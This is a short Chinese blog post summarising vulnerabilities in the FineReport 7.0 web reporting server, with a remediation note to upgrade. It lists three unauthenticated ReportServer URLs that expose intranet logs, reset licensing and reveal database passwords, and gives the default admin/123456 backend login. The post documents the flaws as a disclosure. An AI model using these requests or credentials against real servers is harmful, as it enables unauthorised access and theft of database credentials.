帆软报表漏洞总结

一、漏洞背景

FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。

二、版本查看

  • 弱口令漏洞提供了访问此页面方法
    帆软报表漏洞总结_第1张图片

三、漏洞总结

1.未授权访问漏洞

http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码

帆软报表漏洞总结_第2张图片帆软报表漏洞总结_第3张图片2.默认弱口令

  • 访问https://ip/ReportServer,点击服务器管理平台进入后台页面
    帆软报表漏洞总结_第4张图片
  • 默认密码为弱口令admin/123456
    帆软报表漏洞总结_第5张图片

四、漏洞修复

更新帆软报表的版本

  • 目前仅为本人自己遇见的一些情况,后续若遇到新的poc或者exp会进行及时更新,恳请大佬师傅们提成建议!

仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!

你可能感兴趣的:(网络,安全,web安全)